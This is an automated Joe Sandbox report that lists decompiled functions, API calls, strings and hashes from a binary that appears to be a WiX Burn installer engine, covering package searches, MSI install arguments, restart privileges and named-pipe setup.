Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb0885af9b46570bdc65274db2639a4da7580c14c304af622630359ffa96446a
Instruction ID: 764cf6e3e2d338cc765ce70f77a629c7e485bcc964d933e1515c6abe38ea21b7
Opcode Fuzzy Hash: eb0885af9b46570bdc65274db2639a4da7580c14c304af622630359ffa96446a
Instruction Fuzzy Hash: 94B01295269013ADB64851453C07C3F0E4CFBC2B11330C91EB400C11C6E8400C444132

Function 00509684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0050966B

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4420b45cbc452f3bd2b47c018a44baaec2f513bef29384918d4959b71ccaad77
Instruction ID: 8419e6f69e44b2cc06030faf935f1a62cb121cc77de458f32cb4a065384a9853
Opcode Fuzzy Hash: 4420b45cbc452f3bd2b47c018a44baaec2f513bef29384918d4959b71ccaad77
Instruction Fuzzy Hash: 9BB01295269212ADBA4851853E47C3F0D4CFFC3F11330891EB000D11CAE8410C410132

Function 004C1361 Relevance: 1.3, APIs: 1, Instructions: 88stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BDB
Part of subcall function 004C3BD3: HeapSize.KERNEL32(00000000,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BE2

lstrlenW.KERNEL32(000001C7,000001C7,80004005,00000000,?,cabextract.cpp,000001C7), ref: 004C139C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: d0c6cd72df36f10a88a72bb1d913a3593e687a55befe9cb94505f7e39ab71f5d
Instruction ID: a780451eb795cca06d863c79f0af950331f0659123e0836b24834a600d098ced
Opcode Fuzzy Hash: d0c6cd72df36f10a88a72bb1d913a3593e687a55befe9cb94505f7e39ab71f5d
Instruction Fuzzy Hash: 5721063AD00118AFDB518F69C840F6EB7A5EF46324F55815EEC40A7372C7389D119B88

Function 004C14B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,004C21A8,?,00000000,?,00000000,?,004C390C,00000000,?,00000104), ref: 004C14E8

Part of subcall function 004C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BDB
Part of subcall function 004C3BD3: HeapSize.KERNEL32(00000000,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BE2

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 208dabb38a4b92024d4e7d16caf3cba1e91e5b52c9701b1d2ee420a668a8a23a
Instruction ID: 53e67fdff18e7f5f6766f980aad88a780cf9c76c0d1bac2b7a5a7d7fbba5db7e
Opcode Fuzzy Hash: 208dabb38a4b92024d4e7d16caf3cba1e91e5b52c9701b1d2ee420a668a8a23a
Instruction Fuzzy Hash: 8901D63B200218BBCF515E55DC80F9A7765AF86764F61821FFA165B273D63AAC00869C

Non-executed Functions

Function 004CA8F1 Relevance: 173.9, APIs: 29, Strings: 70, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004CB11C

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CompareStringW.KERNEL32(0000007F,00000000,0050CA9C,000000FF,DirectorySearch,000000FF,0050CA9C,Condition,feclient.dll,0050CA9C,Variable,?,0050CA9C,0050CA9C,?,?), ref: 004CAA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 004CAA7E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 004CAA9A
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 004CAABE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 004CAB11
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 004CAB2B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 004CAB53
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 004CAB91
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 004CABB0
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 004CABCF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 004CAC8D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 004CACA7

Part of subcall function 005032F3: VariantInit.OLEAUT32(?), ref: 00503309
Part of subcall function 005032F3: SysAllocString.OLEAUT32(?), ref: 00503325
Part of subcall function 005032F3: VariantClear.OLEAUT32(?), ref: 005033AC
Part of subcall function 005032F3: SysFreeString.OLEAUT32(00000000), ref: 005033B7

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 004CAD06
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 004CAD28
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 004CAD48
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 004CAE20
SysFreeString.OLEAUT32(?), ref: 004CAFFE

Strings

Failed to get @FeatureId., xrefs: 004CB0B7
`5w, xrefs: 004CAFFE, 004CB11C
UpgradeCode, xrefs: 004CAE8C
Failed to get @Condition., xrefs: 004CB028
Type, xrefs: 004CAA56, 004CAAE9, 004CAC42, 004CADC2, 004CAEC2, 004CAFAC
Unexpected element name: %ls, xrefs: 004CB0CD
Failed to get Value attribute., xrefs: 004CB03C
Failed to get @ExpandEnvironment., xrefs: 004CB050
Key, xrefs: 004CAC04
Invalid value for @Type: %ls, xrefs: 004CB0A1
Path, xrefs: 004CAA3B, 004CAACE
msi.dll, xrefs: 004CAC5C
ComponentId, xrefs: 004CADA7
comres.dll, xrefs: 004CADA6, 004CAE5B, 004CAE8B, 004CAF90
version.dll, xrefs: 004CAC1E
exists, xrefs: 004CAA6F, 004CAB02, 004CAC7E
VariableType, xrefs: 004CACDE
directory, xrefs: 004CAE13
HKU, xrefs: 004CABE1
Failed to get @UpgradeCode., xrefs: 004CB08D
feclient.dll, xrefs: 004CA9F8
numeric, xrefs: 004CACF7
clbcatq.dll, xrefs: 004CAA3A, 004CAACD, 004CAD83, 004CAF75
MsiProductSearch, xrefs: 004CAE39
RegistrySearch, xrefs: 004CAB46
Failed to select search nodes., xrefs: 004CA920
Failed to get next node., xrefs: 004CB0EB
Win64, xrefs: 004CAC5D
MsiComponentSearch, xrefs: 004CAD61
path, xrefs: 004CAA8D, 004CAB3A
Failed to get @ProductCode., xrefs: 004CB0BE
cabinet.dll, xrefs: 004CACBA
keyPath, xrefs: 004CADDB
Failed to get @ProductCode or @UpgradeCode., xrefs: 004CB094
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 004CA90D
Failed to get @ComponentId., xrefs: 004CB086
language, xrefs: 004CAEF7
Failed to get Win64 attribute., xrefs: 004CB046
Value, xrefs: 004CAC1F
FeatureId, xrefs: 004CAF91
Failed to get @VariableType., xrefs: 004CB064
version, xrefs: 004CAB1E, 004CAD3B, 004CAEDB
HKCU, xrefs: 004CABA3
value, xrefs: 004CAC9A
Condition, xrefs: 004CA9F9
MsiFeatureSearch, xrefs: 004CAF53
ETL, xrefs: 004CA8F1
Root, xrefs: 004CAB69
FileSearch, xrefs: 004CAAB1
Invalid value for @VariableType: %ls, xrefs: 004CB05D
string, xrefs: 004CAD1B
Failed to get @Variable., xrefs: 004CB0DD
Failed to get @Path., xrefs: 004CB032
ProductCode, xrefs: 004CAD84, 004CAE5C, 004CAF76
HKLM, xrefs: 004CABC2
assignment, xrefs: 004CAF2D
Invalid value for @Root: %ls, xrefs: 004CB078
Failed to get @Type., xrefs: 004CB0B0
DirectorySearch, xrefs: 004CAA1A
Failed to get @Id., xrefs: 004CB0E4
Failed to allocate memory for search structs., xrefs: 004CA97D
Failed to get Key attribute., xrefs: 004CB06E
wininet.dll, xrefs: 004CAC03
Variable, xrefs: 004CA9DE
Failed to get @Root., xrefs: 004CB07F
search.cpp, xrefs: 004CA973
state, xrefs: 004CADF7, 004CAF13, 004CAFC5
ExpandEnvironment, xrefs: 004CACBB
Failed to get search node count., xrefs: 004CA945
HKCR, xrefs: 004CAB82

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ETL$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`5w$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-3885948408
Opcode ID: 0f796c2259d15f9937a6f704d70734c10f94076634eb4fc1c7ba5c8d31017bab
Instruction ID: 31804ae31643083ca28b037ba8b1069079413173e4b8051182918c0592981a4c
Opcode Fuzzy Hash: 0f796c2259d15f9937a6f704d70734c10f94076634eb4fc1c7ba5c8d31017bab
Instruction Fuzzy Hash: 7222C239D4822ABACB608A558C47F6F7E64FB01734F30471AF530B62D0DB74AE5096DA

Function 004E41EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON

Download Yara Rule

Strings

WixBundleExecutePackageCacheFolder, xrefs: 004E436A, 004E48A4
Failed to enable logging for package: %ls to: %ls, xrefs: 004E441F
Failed to add reboot suppression property on install., xrefs: 004E45BB
VersionString, xrefs: 004E428E, 004E42EF
Failed to run maintanance mode for MSI package., xrefs: 004E46F6
Failed to perform minor upgrade of MSI package., xrefs: 004E4638
msasn1.dll, xrefs: 004E440B
crypt32.dll, xrefs: 004E440A
Failed to add reinstall all property on minor upgrade., xrefs: 004E45EA
Failed to get cached path for package: %ls, xrefs: 004E434F
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 004E45F5
Failed to add reboot suppression property on uninstall., xrefs: 004E477D
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 004E460C
Failed to add properties to argument string., xrefs: 004E4463
Failed to add feature action properties to argument string., xrefs: 004E44B9
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 004E469B
Failed to add the list of dependencies to ignore to the properties., xrefs: 004E46CA
Failed to initialize external UI handler., xrefs: 004E43F4
REBOOT=ReallySuppress, xrefs: 004E45A0, 004E476C
Failed to install MSI package., xrefs: 004E4746
REINSTALL=ALL, xrefs: 004E45D3, 004E464D
Failed to add patch properties to argument string., xrefs: 004E44FD
ACTION=ADMIN, xrefs: 004E4709
%ls %ls=ALL, xrefs: 004E46B6, 004E4795
Failed to add obfuscated properties to argument string., xrefs: 004E4497
feclient.dll, xrefs: 004E42C5, 004E434D, 004E441D, 004E454B, 004E47D8
Failed to uninstall MSI package., xrefs: 004E47EF
Failed to add feature action properties to obfuscated argument string., xrefs: 004E44DB
Failed to build MSI path., xrefs: 004E439D
Failed to add patch properties to obfuscated argument string., xrefs: 004E451F
WixBundleExecutePackageAction, xrefs: 004E43B7, 004E48B4
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 004E4687
IGNOREDEPENDENCIES, xrefs: 004E46A5, 004E4784
Failed to add ADMIN property on admin install., xrefs: 004E471E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
API String ID: 0-2033600224
Opcode ID: c65206f894aeca9ca8d8c077bbaaae46b1ee47c555a163ab0fbd7bdc2635dd86
Instruction ID: 8f28b4a70968b34322b634d07e5a0e7c6ed4d060699988156350473785c7d11f
Opcode Fuzzy Hash: c65206f894aeca9ca8d8c077bbaaae46b1ee47c555a163ab0fbd7bdc2635dd86
Instruction Fuzzy Hash: D802F571A40665AFDB219F56CC45FAA7B7ABF84301F0001AAF908A7251D776DEA0CFC4

Function 00501719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 005017B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005017BB
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00501808
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0050180E
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00501848
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0050184E
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0050188E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00501894
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 005018D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005018DA
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0050191A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00501920
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00501A11
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00501A4B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00501A55
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00501A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00501A97
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00501AD0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00501ADA
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00501B18
LocalFree.KERNEL32(?), ref: 00501B2E

Strings

srputil.cpp, xrefs: 005017DC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 267631441-4105181634
Opcode ID: 029adb9e0cfd61e96db5239aea824c6eaeaf08102ad9c7f5f89891d33a070d76
Instruction ID: cceb4f4af311698354f29e9c9b2990b518b5fa85f615ec7d52d037a5283fb412
Opcode Fuzzy Hash: 029adb9e0cfd61e96db5239aea824c6eaeaf08102ad9c7f5f89891d33a070d76
Instruction Fuzzy Hash: C6C18376D4163DABD7308B968C49BDFFEB8BF44750F0105AAA904B7280E7709E448EA5

Function 004EC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON

Download Yara Rule

Strings

Failed to copy local source path for pseudo bundle., xrefs: 004EC43B
Failed to allocate memory for pseudo bundle payload hash., xrefs: 004EC4AD
Failed to allocate memory for dependency providers., xrefs: 004EC6DE
Failed to copy install arguments for related bundle package, xrefs: 004EC584
Failed to copy cache id for pseudo bundle., xrefs: 004EC55F
Failed to append relation type to repair arguments for related bundle package, xrefs: 004EC5F1
Failed to copy key for pseudo bundle payload., xrefs: 004EC3F3
Failed to copy repair arguments for related bundle package, xrefs: 004EC5D0
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 004EC644
Failed to copy uninstall arguments for related bundle package, xrefs: 004EC623
Failed to append relation type to install arguments for related bundle package, xrefs: 004EC5A9
Failed to copy filename for pseudo bundle., xrefs: 004EC417
Failed to copy key for pseudo bundle., xrefs: 004EC542
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 004EC385
Failed to copy download source for pseudo bundle., xrefs: 004EC469
pseudobundle.cpp, xrefs: 004EC379, 004EC3B2, 004EC4A1, 004EC6D2
-%ls, xrefs: 004EC34C
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 004EC3BE
Failed to copy version for pseudo bundle., xrefs: 004EC72D
Failed to copy display name for pseudo bundle., xrefs: 004EC74F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: b19025cf7e9a5b4cb95831151dbe181137e593cc828f762d005082450271c1e6
Instruction ID: be49bb9c7fbc9b81d88fd296869054fa441309db41d7ac123e7c620376fa9e97
Opcode Fuzzy Hash: b19025cf7e9a5b4cb95831151dbe181137e593cc828f762d005082450271c1e6
Instruction Fuzzy Hash: E5C1D371A00696BBDB559F26C8C1E6A7B98BF08315B00412BFD05DB341DB78EC529BD8

Function 004C45EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 004C4617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004C461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004C4628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004C4678
GetLastError.KERNEL32 ref: 004C4682
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 004C46C6
GetLastError.KERNEL32 ref: 004C46D0
Sleep.KERNEL32(000003E8), ref: 004C470C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 004C471D
GetLastError.KERNEL32 ref: 004C4727
CloseHandle.KERNEL32(?), ref: 004C477D

Strings

Failed to schedule restart., xrefs: 004C4768
engine.cpp, xrefs: 004C464C, 004C46A6, 004C46F4, 004C475E
SeShutdownPrivilege, xrefs: 004C466B
Failed to get shutdown privilege LUID., xrefs: 004C46B0
Failed to adjust token to add shutdown privileges., xrefs: 004C46FE
Failed to get process token., xrefs: 004C4656

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
API String ID: 2241679041-1583736410
Opcode ID: 870ceac0617071dc5337e0d3840a5fb1ece7fbab3b7f60ac9546074e2bafd11d
Instruction ID: 02968891f7b431fc2799276c0c82a19aa73649d5fe8ca529ed22e7380ed717d9
Opcode Fuzzy Hash: 870ceac0617071dc5337e0d3840a5fb1ece7fbab3b7f60ac9546074e2bafd11d
Instruction Fuzzy Hash: 7C413C3BE41226ABE7209BA58E9AF7F7A58BB41711F01012EFE00B6380D72D4D0481E5

Function 004D4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 004D4F0D
GetLastError.KERNEL32(?,00000000,?,?,004C452F,?), ref: 004D4F16
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,004C452F,?), ref: 004D4FB8
GetLastError.KERNEL32(?,004C452F,?), ref: 004D4FC5
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,004C452F), ref: 004D5040
GetLastError.KERNEL32(?,?,?,?,?,?,?,004C452F,?), ref: 004D504B
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,004C452F,?), ref: 004D508B
LocalFree.KERNEL32(00000000,?,004C452F,?), ref: 004D50B9

Strings

\\.\pipe\%ls, xrefs: 004D4F6E
pipe.cpp, xrefs: 004D4F3A, 004D4FE9, 004D506F
Failed to create the security descriptor for the connection event and pipe., xrefs: 004D4F44
